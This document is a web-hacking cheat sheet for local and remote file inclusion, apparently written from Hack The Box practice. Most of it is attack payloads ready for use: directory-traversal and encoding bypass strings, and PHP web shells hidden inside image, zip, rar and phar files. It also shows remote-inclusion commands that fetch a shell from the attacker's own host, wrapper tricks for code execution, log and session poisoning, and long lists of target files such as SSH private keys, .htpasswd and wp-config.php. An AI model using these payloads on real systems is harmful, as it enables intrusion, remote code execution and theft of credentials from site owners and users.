File path traversal/Local File Inclusion

Wordlists

Windows: https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt

Linux: https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt

Awesome Wordlist

LFI Wordlists
LFI-Jhaddix.txt
Webroot path wordlist for Linux
Webroot path wordlist for Windows
Server configurations wordlist for Linux
Server configurations wordlist for Windows

File Inclusion Functions

Function	Read Content	Execute	Remote URL
PHP
include()/include_once()	Yes	Yes	Yes
require()/require_once()	Yes	Yes	No
file_get_contents()	Yes	No	Yes
fopen()/file()	Yes	No	No
NodeJS
fs.readFile()	Yes	No	No
fs.sendFile()	Yes	No	No
res.render()	Yes	Yes	No
Java
include	Yes	No	No
import	Yes	Yes	Yes
.NET
@Html.Partial()	Yes	No	No
@Html.RemotePartial()	Yes	No	Yes
Response.WriteFile()	Yes	No	No
include	Yes	Yes	Yes

Cheetsheet

#Basic LFI
http://example.com/index.php?page=../../../etc/passwd
#Null Byte
http://example.com/index.php?page=../../../etc/passwd%00
http://example.com/index.php?page=../../../etc/passwd%00.png
#Double Encoding
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
#UTF-8 Encoding
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00
#Path Truncation
http://example.com/index.php?page=../../../etc/passwd............[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE] 
http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd
#Filter Bypass
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd

Remote File Inclusion (RFI)

Remote File Inclusion doesn't work anymore on a default configuration since allow_url_include is now disabled since PHP 5.

#Create malicious File
Intrusionz3r0@htb[/htb]$ echo '<?php system($_GET["cmd"]); ?>' > shell.php
Intrusionz3r0@htb[/htb]$ echo 'GIF8<?php system($_GET[0]); ?>' > shell.gif
Intrusionz3r0@htb[/htb]$ echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php #output file

#Set up a server
Intrusionz3r0@htb[/htb]$ sudo python3 -m http.server <LISTENING_PORT>
Intrusionz3r0@htb[/htb]$ sudo python -m pyftpdlib -p 21
Intrusionz3r0@htb[/htb]$ impacket-smbserver -smb2support share $(pwd)

#Trigger the RFI through URL
Intrusionz3r0@htb[/htb]$ curl 'http://<SERVER_IP>:<PORT>/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id'
Intrusionz3r0@htb[/htb]$ curl 'http://<SERVER_IP>:<PORT>/index.php?language=ftp://user:pass@localhost/shell.php&cmd=id'
Intrusionz3r0@htb[/htb]$ curl 'http://<SERVER_IP>:<PORT>/index.php?language=\\\\<OUR_IP>\\share\\shell.php&cmd=whoami'

Wrappers

#Read Files and convert them into base64 to bypass restrictions
php://filter/read=convert.base64-encode/resource=<path-filename>

#Remote Code Execution Wrapper
data://text/plain;base64,<base64-string>&cmd=<command>
php://input&cmd=<command>
expect://<command>

#Upload LFI to RCE

#Zip File
Intrusionz3r0@htb[/htb]$ echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;  
Intrusionz3r0@htb[/htb]$ zip payload.zip payload.php;
Intrusionz3r0@htb[/htb]$ mv payload.zip shell.jpg;
Intrusionz3r0@htb[/htb]$ rm payload.php

zip://./profile_images/shell.jpg%23shell.php&cmd=id

#RAR File
Intrusionz3r0@htb[/htb]$ rar a payload.rar payload.php;
Intrusionz3r0@htb[/htb]$ mv payload.rar shell.jpg;
Intrusionz3r0@htb[/htb]$ rm payload.php

rar://./profile_images/shell.jpg%23shell.php&cmd=id

#PHAR malicious file
<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->stopBuffering();

#Compile file
Intrusionz3r0@htb[/htb]$ php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id

Automated Scanning

#Fuzzing parameters
Intrusionz3r0@htb[/htb]$ ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287

#Fuzzing LFI paths Windows/Linux
Intrusionz3r0@htb[/htb]$ ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287

#Discover Server Webroot
Intrusionz3r0@htb[/htb]$ ffuf -w /opt/useful/SecLists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287

#Server los and configuration (precise scan by using DragonJar wordlist) 
Intrusionz3r0@htb[/htb]$ ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287

Log Poisoning attack

# Apache Logs
?page=/var/log/apache/access.log
?page=/var/log/apache/error.log
?page=/var/log/apache2/access.log
?page=/var/log/apache2/error.log

# Nginx Logs
?page=/var/log/nginx/access.log
?page=/var/log/nginx/error.log
?page=/usr/local/nginx/logs/access.log
?page=/usr/local/nginx/logs/error.log

# PHP Logs (Common in Apache/Nginx setups)
?page=/var/log/php_errors.log
?page=/etc/php/7.4/fpm/php-fpm.log
?page=/etc/php/8.0/fpm/php-fpm.log

# System Logs (SSH)
?page=/var/log/auth.log
?page=/var/log/secure
?page=/var/log/syslog
?page=/var/log/messages

# Custom Logs (Shared Hosting or Web Servers)
?page=/home/<username>/logs/error_log
?page=/home/<username>/logs/access_log

Server log poisoning

By default, Apache logs are located in /var/log/apache2/ on Linux and in C:\\xampp\\apache\\logs\\ on Windows, while Nginx logs are located in /var/log/nginx/ on Linux and in C:\\nginx\\log\\ on Windows.

Files in:

• access.log

• error.log

Payload: http://<SERVER_IP>:<PORT>/index.php?language=/var/log/apache2/access.log

Poisoning the logs

Intrusionz3r0@htb[/htb]$ curl -s "http://<SERVER_IP>:<PORT>/index.php" -A "<?php system($_GET['cmd']); ?>"

Read the logs through LFI

PHP Session Poisoning

Most PHP web applications utilize PHPSESSID cookie and these details are stored in session files on the back-end, and saved:

• Linux: /var/lib/php/sessions/sess_<PHPSESSID>

• Windows: C:\Windows\Temp\sess_<PHPSESSID>

The name of the file that contains our user's data matches the name of our PHPSESSID cookie with the sess_ prefix.

#Poisoning the logs through web php shell
http://<SERVER_IP>:<PORT>/index.php?language=<?php%20system($_GET[0]);%20?>
#Read logs through LFI
http://<SERVER_IP>:<PORT>/index.php?language=/var/lib/php/sessions/**sess_nhhv8i0o6ua4g88bkdl9u1fdsd&0=pwd**

Interesting Files

# Home directories
?page=/home/<username>/.bashrc
?page=/home/<username>/.bash_history
?page=/home/<username>/.bash_logout
?page=/home/<username>/.bash_profile
?page=/home/<username>/.profile
?page=/home/<username>/.ssh/id_rsa

# Root directory
?page=/root/.bashrc
?page=/root/.bash_history
?page=/root/.bash_logout
?page=/root/.bash_profile
?pgae=/root/.profile
?page=/root/.ssh/id_rsa

# System-wide configurations
?page=/etc/bash.bashrc

# OS
?page=/etc/lsb-release
?page=/etc/os-release

# Processes
?page=/proc/self/stat
?page=/proc/net/tcp
?page=/proc/self/cmdline
?page=/proc/self/environ
?page=/proc/self/fd/0
?page=/proc/self/fd/1
?page=/proc/<pid>/cmdline
?page=/proc/<pid>/environ

# Mail
?page=/var/mail/<username>
?page=/var/spool/mail/<username>
# Postfix
?page=/var/log/mail.log
?page=/var/log/maillog

# Host
?page=/etc/hosts
?page=/etc/hostname
# Cron
?page=/etc/crontab

# Web root
?page=/var/www/html/index.html
?page=/var/www/html/index.php
?page=/var/www/html/.htaccess
?page=/var/www/html/.htpasswd
?page=/var/www/example.com/index.php
?page=/var/www/sudomain/index.php
?page=/var/www/subdomain.example.com/index.php
?page=/var/www/wordpress/index.php

# Apache
?page=/etc/apache2/.htpasswd
?page=/etc/apache2/apache2.conf
?page=/etc/apache2/envvars
?page=/etc/apache2/ports.conf
?page=/etc/apache2/sites-available/domain.conf
?page=/etc/apache2/sites-available/example.com.conf
?page=/etc/apache2/sites-available/sub.example.com.conf
?page=/etc/apache2/sites-available/sub.conf
?page=/etc/apache2/sites-enabled/000-default.conf
?page=/etc/apache2/sites-enabled/domain.conf
?page=/etc/apache2/sites-enabled/example.com.conf
?page=/etc/apache2/sites-enabled/sub.example.com.conf
?page=/etc/apache2/sites-enabled/sub.conf
?page=/var/log/apache/access.log
?page=/var/log/apache/error.log
?page=/var/log/apache2/access.log
?page=/var/log/apache2/error.log

# Apache Tomcat
?page=/opt/tomcat/conf/tomcat-users.xml
?page=/opt/tomcat/logs/catalina.err
?page=/opt/tomcat/logs/catalina.out

# Nginx
?page=/var/log/nginx/access.log
?page=/var/log/nginx/error.log
?page=/etc/nginx/nginx.conf
?page=/etc/nginx/conf.d/.htpasswd
?page=/etc/nginx/conf.d/example.com.conf
?page=/etc/nginx/conf.d/example.conf
?page=/etc/nginx/conf.d/subdomain.example.com.conf
?page=/etc/nginx/conf.d/subdomain.conf
?page=/etc/nginx/sites-available/default
?page=/etc/nginx/sites-available/example.com.conf
?page=/etc/nginx/sites-enabled/default
?page=/etc/nginx/sites-enabled/example.com.conf
?page=/usr/local/nginx/conf/nginx.conf
?page=/usr/local/etc/nginx/nginx.conf

# PHP web conf (x.x is specified PHP version)
?page=/etc/php/x.x/apache2/php.ini
?page=/etc/php/x.x/cli/php.ini
?page=/etc/php/x.x/fpm/php.ini

# Flask
?page=index.html
?page=../__init__.py
?page=../app.py
?page=../db.py
?page=../main.py
?page=/home/<username>/<appname>/app.py
?page=/opt/<appname>/app.py
?page=/srv/<appname>/app.py

# BIND
?page=/etc/bind/named.conf
?page=/etc/bind/named.conf.options
?page=/etc/bind/named.conf.local
?page=/etc/bind/named.conf.default-zones

# Windows
?page=C:/Windows/debug/NetSetup.log 
?page=C:/Windows/System32/drivers/etc/hosts
?page=C:/Windows/System32/inetsrv/config/applicationHost.config
?page=../../../../../../../../windows/system32/drivers/etc/hosts
?page=C:/Users/Public/Desktop/desktop.ini
?page=C:/Users/FUZZ/Desktop/desktop.ini # user enumeration
?page=C:/inetpub/wwwroot/<project>/web.config
?page=C:/xampp/apache/conf/httpd.conf
?page=C:/xampp/apache/conf/extra/httpd-userdir.conf
?page=C:/xampp/apache/conf/extra/httpd-vhosts.conf
?page=C:/xampp/apache/conf/extra/httpd-xampp.conf
?page=C:/xampp/apache/conf/extra/httpd-ajp.conf
?page=C:/xampp/apache/logs/access.log
?page=C:/xampp/apache/logs/error.log
?page=C:/xampp/cgi-bin/example.cgi
?page=C:/xampp/htdocs/example.com/index.php
?page=C:/xampp/htdocs/sub.example.com/index.php
?page=C:/xampp/phpMyAdmin/index.php
?page=C:/xampp/phpMyAdmin/config.inc.php

LFI Interesting Wordpress Files

# WordPress Core Files
?page=wp-config.php
?page=.htaccess
?page=.user.ini
?page=wp-includes/version.php
?page=wp-content/themes/twentytwentyone/functions.php
?page=wp-content/themes/twentytwentythree/functions.php
?page=wp-content/plugins/hello.php
?page=wp-content/uploads/.htaccess
?page=wp-content/uploads/custom-image.jpg

# WordPress Database Configurations
?page=/var/www/html/wordpress/wp-config.php
?page=/var/www/wordpress/wp-config.php
?page=/var/www/example.com/wp-config.php
?page=/var/www/sub.example.com/wp-config.php
?page=/var/www/html/wordpress/wp-content/plugins/akismet/akismet.php
?page=/var/www/html/wordpress/wp-content/themes/twentytwenty/functions.php

# Backup Files
?page=/var/backups/wordpress.sql
?page=/var/backups/wordpress.zip
?page=/var/backups/db.sql
?page=/var/backups/wp-content.zip

# Logs and Debugging Files
?page=debug.log
?page=/var/www/html/wordpress/wp-content/debug.log
?page=/var/www/html/wordpress/wp-content/uploads/debug.log
?page=/var/log/apache2/access.log
?page=/var/log/apache2/error.log
?page=/var/log/nginx/access.log
?page=/var/log/nginx/error.log

# WordPress JSON REST API
?page=/wp-json/wp/v2/posts
?page=/wp-json/wp/v2/users
?page=/wp-json/wp/v2/pages
?page=/wp-json/wp/v2/media

# XMLRPC Files
?page=/xmlrpc.php
?page=/wp-includes/IXR/class-IXR.php

# Sensitive Directories
?page=/wp-content/
?page=/wp-admin/
?page=/wp-includes/
?page=/wp-content/uploads/
?page=/wp-content/plugins/
?page=/wp-content/themes/

# Plugins Configuration
?page=/wp-content/plugins/woocommerce/includes/class-wc-cart.php
?page=/wp-content/plugins/elementor/includes/plugin.php
?page=/wp-content/plugins/contact-form-7/includes/controller.php

# Themes Configuration
?page=/wp-content/themes/twentytwentyone/style.css
?page=/wp-content/themes/twentytwenty/functions.php
?page=/wp-content/themes/customtheme/style.css

# wp-cli
?page=/usr/local/bin/wp-cli.phar

# Cron Jobs
?page=/wp-cron.php

# System Configurations
?page=/etc/apache2/apache2.conf
?page=/etc/apache2/sites-enabled/000-default.conf
?page=/etc/nginx/sites-available/default
?page=/etc/nginx/sites-available/wordpress.conf
?page=/etc/php/7.4/apache2/php.ini
?page=/etc/php/8.0/apache2/php.ini

# Database Files
?page=/var/lib/mysql/wordpress/wp_users.MYD
?page=/var/lib/mysql/wordpress/wp_posts.MYD
?page=/var/lib/mysql/wordpress/wp_options.MYD
?page=/var/lib/mysql/mysql/user.MYD